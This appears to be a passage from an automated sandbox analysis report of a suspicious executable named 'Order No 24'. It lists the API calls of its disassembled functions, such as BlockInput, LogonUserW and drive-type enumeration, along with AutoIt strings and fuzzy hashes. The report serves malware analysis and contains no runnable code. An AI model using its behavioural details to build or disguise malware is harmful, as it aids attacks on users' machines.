                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3192549508-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: _memmove
• String ID:
• API String ID: 4104443479-0
Similarity
• API ID:
• String ID:
• API String ID:
Similarity
• API ID: __itow__swprintf
• String ID:
• API String ID: 674341424-0
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• __time64.LIBCMT ref: 009CB6DF
  • Part of subcall function 009A344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,009CBDC3,00000000,?,?,?,?,009CBF70,00000000,?), ref: 009A3453
  • Part of subcall function 009A344A: __aulldiv.LIBCMT ref: 009A3473
Similarity
• API ID: Time$FileSystem__aulldiv__time64
• String ID:
• API String ID: 2893107130-0
APIs
• BlockInput.USER32(00000001), ref: 009D6ACA
Similarity
• API ID: BlockInput
• String ID:
• API String ID: 3456056419-0
APIs
• mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 009C74DE
Similarity
• API ID: mouse_event
• String ID:
• API String ID: 2434400541-0
APIs
• LogonUserW.ADVAPI32(?,00000001,?,?,00000000,009BAD3E), ref: 009BB124
Similarity
• API ID: LogonUser
• String ID:
• API String ID: 1244722697-0
APIs
Similarity
• API ID: NameUser
• String ID:
• API String ID: 2645101109-0
                                                                                                                                  APIs
                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(?), ref: 009A818F
                                                                                                                                  Memory Dump Source
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                  Memory Dump Source
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Exception@8Throwstd::exception::exception
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3728558374-0
                                                                                                                                  APIs
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 009DA2FE
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 009DA310
                                                                                                                                  • DestroyWindow.USER32 ref: 009DA31E
                                                                                                                                  • GetDesktopWindow.USER32 ref: 009DA338
                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 009DA33F
                                                                                                                                  • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 009DA480
                                                                                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 009DA490
                                                                                                                                  • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009DA4D8
                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 009DA4E4
                                                                                                                                  • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 009DA51E
                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009DA540
                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009DA553
                                                                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009DA55E
                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 009DA567
                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009DA576
                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 009DA57F
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009DA586
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 009DA591
                                                                                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009DA5A3
                                                                                                                                  • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00A0D9BC,00000000), ref: 009DA5B9
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 009DA5C9
                                                                                                                                  • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 009DA5EF
                                                                                                                                  • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 009DA60E
                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009DA630
                                                                                                                                  • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009DA81D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                  • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                  • API String ID: 2211948467-2373415609
                                                                                                                                  • Opcode ID: 09c354eb9159f1b25566abc0814d96f6ad2e50c22464729a144f483d776db4d4
                                                                                                                                  • Instruction ID: 5ec785d81fc9488c99ba06d5b1049632dfa72469fc911e6a9ae17b67855003f8
                                                                                                                                  • Opcode Fuzzy Hash: 09c354eb9159f1b25566abc0814d96f6ad2e50c22464729a144f483d776db4d4
                                                                                                                                  • Instruction Fuzzy Hash: A0026E76900208EFDB14DFE4CD89EAE7BB9FB89310F048559F915AB2A0C7749D42CB60
                                                                                                                                  APIs
                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 009ED2DB
                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 009ED30C
                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 009ED318
                                                                                                                                  • SetBkColor.GDI32(?,000000FF), ref: 009ED332
                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 009ED341
                                                                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 009ED36C
                                                                                                                                  • GetSysColor.USER32(00000010), ref: 009ED374
                                                                                                                                  • CreateSolidBrush.GDI32(00000000), ref: 009ED37B
                                                                                                                                  • FrameRect.USER32(?,?,00000000), ref: 009ED38A
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 009ED391
                                                                                                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 009ED3DC
                                                                                                                                  • FillRect.USER32(?,?,00000000), ref: 009ED40E
                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 009ED439
                                                                                                                                    • Part of subcall function 009ED575: GetSysColor.USER32(00000012), ref: 009ED5AE
                                                                                                                                    • Part of subcall function 009ED575: SetTextColor.GDI32(?,?), ref: 009ED5B2
                                                                                                                                    • Part of subcall function 009ED575: GetSysColorBrush.USER32(0000000F), ref: 009ED5C8
                                                                                                                                    • Part of subcall function 009ED575: GetSysColor.USER32(0000000F), ref: 009ED5D3
                                                                                                                                    • Part of subcall function 009ED575: GetSysColor.USER32(00000011), ref: 009ED5F0
                                                                                                                                    • Part of subcall function 009ED575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 009ED5FE
                                                                                                                                    • Part of subcall function 009ED575: SelectObject.GDI32(?,00000000), ref: 009ED60F
                                                                                                                                    • Part of subcall function 009ED575: SetBkColor.GDI32(?,00000000), ref: 009ED618
                                                                                                                                    • Part of subcall function 009ED575: SelectObject.GDI32(?,?), ref: 009ED625
                                                                                                                                    • Part of subcall function 009ED575: InflateRect.USER32(?,000000FF,000000FF), ref: 009ED644
                                                                                                                                    • Part of subcall function 009ED575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 009ED65B
                                                                                                                                    • Part of subcall function 009ED575: GetWindowLongW.USER32(00000000,000000F0), ref: 009ED670
                                                                                                                                    • Part of subcall function 009ED575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 009ED698
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3521893082-0
                                                                                                                                  • Opcode ID: 62e747d25e9171a9236a8efe0d67f5aa7876c25bddc5ef004a65b9268544485a
                                                                                                                                  • Instruction ID: 22b01dfa67d5b773daaec41a9384f438b570f8cdebb3507306c50e88b4f286e1
                                                                                                                                  • Opcode Fuzzy Hash: 62e747d25e9171a9236a8efe0d67f5aa7876c25bddc5ef004a65b9268544485a
                                                                                                                                  • Instruction Fuzzy Hash: 90919072009305BFCB11DFA4DC08E6B7BA9FF89325F101A19F962961E0D771E946CB52
                                                                                                                                  APIs
                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 009CDBD6
                                                                                                                                  • GetDriveTypeW.KERNEL32(?,00A1DC54,?,\\.\,00A1DC00), ref: 009CDCC3
                                                                                                                                  • SetErrorMode.KERNEL32(00000000,00A1DC54,?,\\.\,00A1DC00), ref: 009CDE29
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorMode$DriveType
                                                                                                                                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                  • API String ID: 2907320926-4222207086
                                                                                                                                  • Opcode ID: 3821271af129e1242d3c523e39e9fd0255d5ecd8d7750d3bbaa3a48875597737
                                                                                                                                  • Instruction ID: daec9203a21439b55efc8f0ec1479911cd5a9ce970fc966481552adbafb66434
                                                                                                                                  • Opcode Fuzzy Hash: 3821271af129e1242d3c523e39e9fd0255d5ecd8d7750d3bbaa3a48875597737
                                                                                                                                  • Instruction Fuzzy Hash: 59518B31E49302ABCA00EF24C882F29B7A4FB94705F205D6EF0479B6D1DA64D946DB43
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __wcsnicmp
                                                                                                                                  • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                                  • API String ID: 1038674560-86951937
                                                                                                                                  • Opcode ID: f62830c1e58ffb27d9911de55534199bab3ca10088c424d6ac4bcae1c37651f9
                                                                                                                                  • Instruction ID: cb1f4289207b43232f8fdced7f53c223ad779521a6a0f1f35de00fdb29f945f1
                                                                                                                                  • Opcode Fuzzy Hash: f62830c1e58ffb27d9911de55534199bab3ca10088c424d6ac4bcae1c37651f9
                                                                                                                                  • Instruction Fuzzy Hash: 0081F7B1640219BBCB24BB68DD82FBF777CAF65310F144429F905AA2C2EB74D941C7A1
                                                                                                                                  APIs
                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 009EC788
                                                                                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 009EC83E
                                                                                                                                  • SendMessageW.USER32(?,00001102,00000002,?), ref: 009EC859
                                                                                                                                  • SendMessageW.USER32(?,000000F1,?,00000000), ref: 009ECB15
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Window
                                                                                                                                  • String ID: 0
                                                                                                                                  • API String ID: 2326795674-4108050209
                                                                                                                                  • Opcode ID: 18084bb29713178b6cf7b8b5532d538b7434d5d6feb05a772c05c1b832073461
                                                                                                                                  • Instruction ID: 0cade907614004d0198ee3401a8c65e136ff1c81d9962cecc614b7244ae80db7
                                                                                                                                  • Opcode Fuzzy Hash: 18084bb29713178b6cf7b8b5532d538b7434d5d6feb05a772c05c1b832073461
                                                                                                                                  • Instruction Fuzzy Hash: E8F1E2B1104385AFD722CF65CC89BAABBE8FF49314F080929F5C9962A1C775DC42CB91
                                                                                                                                  APIs
                                                                                                                                  • CharUpperBuffW.USER32(?,?,00A1DC00), ref: 009E6449
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BuffCharUpper
                                                                                                                                  • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                                  • API String ID: 3964851224-45149045
                                                                                                                                  • Opcode ID: 7b26a310e4f9a28409c524a91571376b13711770b6c96b3774dd3a08578ac7d4
                                                                                                                                  • Instruction ID: 50d3ccdbe9b8a773120d9284614350b8c29c5570b082d22901d9bfd971a6a8f1
                                                                                                                                  • Opcode Fuzzy Hash: 7b26a310e4f9a28409c524a91571376b13711770b6c96b3774dd3a08578ac7d4
                                                                                                                                  • Instruction Fuzzy Hash: A1C180302043858BCB05EF15C551BBE77A5BFE8394F044859F8965B3E2EB25ED4ACB82
APIs
• GetSysColor.USER32(00000012), ref: 009ED5AE
• SetTextColor.GDI32(?,?), ref: 009ED5B2
• GetSysColorBrush.USER32(0000000F), ref: 009ED5C8
• GetSysColor.USER32(0000000F), ref: 009ED5D3
• CreateSolidBrush.GDI32(?), ref: 009ED5D8
• GetSysColor.USER32(00000011), ref: 009ED5F0
• CreatePen.GDI32(00000000,00000001,00743C00), ref: 009ED5FE
• SelectObject.GDI32(?,00000000), ref: 009ED60F
• SetBkColor.GDI32(?,00000000), ref: 009ED618
• SelectObject.GDI32(?,?), ref: 009ED625
• InflateRect.USER32(?,000000FF,000000FF), ref: 009ED644
• RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 009ED65B
• GetWindowLongW.USER32(00000000,000000F0), ref: 009ED670
• SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 009ED698
• GetWindowTextW.USER32(00000000,00000000,00000001), ref: 009ED6BF
• InflateRect.USER32(?,000000FD,000000FD), ref: 009ED6DD
• DrawFocusRect.USER32(?,?), ref: 009ED6E8
• GetSysColor.USER32(00000011), ref: 009ED6F6
• SetTextColor.GDI32(?,00000000), ref: 009ED6FE
• DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 009ED712
• SelectObject.GDI32(?,009ED2A5), ref: 009ED729
• DeleteObject.GDI32(?), ref: 009ED734
• SelectObject.GDI32(?,?), ref: 009ED73A
• DeleteObject.GDI32(?), ref: 009ED73F
• SetTextColor.GDI32(?,?), ref: 009ED745
• SetBkColor.GDI32(?,?), ref: 009ED74F
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
• String ID:
• API String ID: 1996641542-0
• Opcode ID: db7f01e7900745d764470b5711a6ce83478145fe19d0c3875106c4662a842074
• Instruction ID: 8f72f958d7a00d0a971f5d197274771861ad16fbdc85478f68d1705e63090808
• Opcode Fuzzy Hash: db7f01e7900745d764470b5711a6ce83478145fe19d0c3875106c4662a842074
• Instruction Fuzzy Hash: 6F514B72901208AFDF11DFE9DC48AAE7B79FB08320F104615FA15AB2A1DB759A42CB50
APIs
• SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 009EB7B0
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009EB7C1
• CharNextW.USER32(0000014E), ref: 009EB7F0
• SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 009EB831
• SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 009EB847
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009EB858
• SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 009EB875
• SetWindowTextW.USER32(?,0000014E), ref: 009EB8C7
• SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 009EB8DD
• SendMessageW.USER32(?,00001002,00000000,?), ref: 009EB90E
• _memset.LIBCMT ref: 009EB933
• SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 009EB97C
• _memset.LIBCMT ref: 009EB9DB
• SendMessageW.USER32 ref: 009EBA05
• SendMessageW.USER32(?,00001074,?,00000001), ref: 009EBA5D
• SendMessageW.USER32(?,0000133D,?,?), ref: 009EBB0A
• InvalidateRect.USER32(?,00000000,00000001), ref: 009EBB2C
• GetMenuItemInfoW.USER32(?), ref: 009EBB76
• SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 009EBBA3
• DrawMenuBar.USER32(?), ref: 009EBBB2
• SetWindowTextW.USER32(?,0000014E), ref: 009EBBDA
Similarity
• API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
• String ID: 0
• API String ID: 1073566785-4108050209
• Opcode ID: c3b0ea6725ab48c2d7e59a36df9bb216e308ea122263e68220a03c5578d93956
• Instruction ID: 5e697ceb5d405155a16b8dcdba2f4fe92173f1dd9be55fa842c45428c5e82e3e
• Opcode Fuzzy Hash: c3b0ea6725ab48c2d7e59a36df9bb216e308ea122263e68220a03c5578d93956
• Instruction Fuzzy Hash: E6E1BF75900258ABDF22CFA2CC84AEF7B78FF45710F148156FA19AA291D7758E42CF60
APIs
• GetCursorPos.USER32(?), ref: 009E778A
• GetDesktopWindow.USER32 ref: 009E779F
• GetWindowRect.USER32(00000000), ref: 009E77A6
• GetWindowLongW.USER32(?,000000F0), ref: 009E7808
• DestroyWindow.USER32(?), ref: 009E7834
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 009E785D
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 009E787B
• SendMessageW.USER32(?,00000439,00000000,00000030), ref: 009E78A1
• SendMessageW.USER32(?,00000421,?,?), ref: 009E78B6
• SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 009E78C9
• IsWindowVisible.USER32(?), ref: 009E78E9
• SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 009E7904
• SendMessageW.USER32(?,00000411,00000001,00000030), ref: 009E7918
• GetWindowRect.USER32(?,?), ref: 009E7930
• MonitorFromPoint.USER32(?,?,00000002), ref: 009E7956
• GetMonitorInfoW.USER32 ref: 009E7970
• CopyRect.USER32(?,?), ref: 009E7987
• SendMessageW.USER32(?,00000412,00000000), ref: 009E79F2
Similarity
• API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
• String ID: ($0$tooltips_class32
• API String ID: 698492251-4156429822
• Opcode ID: 3beed2f004dda1074709672bc5982ea7207ce8f039d0819923e1bb4d7d611ffa
• Instruction ID: b38087716298c4adc6a63f92e2187a8abfd89031a5f056d15bb6f610c37bf45e
• Opcode Fuzzy Hash: 3beed2f004dda1074709672bc5982ea7207ce8f039d0819923e1bb4d7d611ffa
• Instruction Fuzzy Hash: 6CB16A71608341AFDB05DFA5C988B6AFBE5BF88310F00891DF5999B291DB71EC05CB92
APIs
• GetFileVersionInfoSizeW.VERSION(?,?), ref: 009C6CFB
• GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 009C6D21
• _wcscpy.LIBCMT ref: 009C6D4F
• _wcscmp.LIBCMT ref: 009C6D5A
• _wcscat.LIBCMT ref: 009C6D70
• _wcsstr.LIBCMT ref: 009C6D7B
• VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 009C6D97
• _wcscat.LIBCMT ref: 009C6DE0
• _wcscat.LIBCMT ref: 009C6DE7
• _wcsncpy.LIBCMT ref: 009C6E12
Similarity
• API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
• String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
• API String ID: 699586101-1459072770
• Opcode ID: 5edced4b4a7dbe4697b3a5cfa21e595200dacdfe3f5ec4a1e05f292de878803e
• Instruction ID: f9015f5ac8b8c7d3e98471c94a52ebbdf3454900a3570d281fcc99a7cf45682a
• Opcode Fuzzy Hash: 5edced4b4a7dbe4697b3a5cfa21e595200dacdfe3f5ec4a1e05f292de878803e
• Instruction Fuzzy Hash: FE41D972A002047BEB00AB78DC47FBF777CEF86710F044869F905E6182EB759A01D6A6
APIs
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0099A939
• GetSystemMetrics.USER32(00000007), ref: 0099A941
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0099A96C
• GetSystemMetrics.USER32(00000008), ref: 0099A974
• GetSystemMetrics.USER32(00000004), ref: 0099A999
• SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0099A9B6
• AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0099A9C6
• CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0099A9F9
• SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0099AA0D
• GetClientRect.USER32(00000000,000000FF), ref: 0099AA2B
• GetStockObject.GDI32(00000011), ref: 0099AA47
• SendMessageW.USER32(00000000,00000030,00000000), ref: 0099AA52
  • Part of subcall function 0099B63C: GetCursorPos.USER32(000000FF), ref: 0099B64F
  • Part of subcall function 0099B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0099B66C
  • Part of subcall function 0099B63C: GetAsyncKeyState.USER32(00000001), ref: 0099B691
  • Part of subcall function 0099B63C: GetAsyncKeyState.USER32(00000002), ref: 0099B69F
• SetTimer.USER32(00000000,00000000,00000028,0099AB87), ref: 0099AA79
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
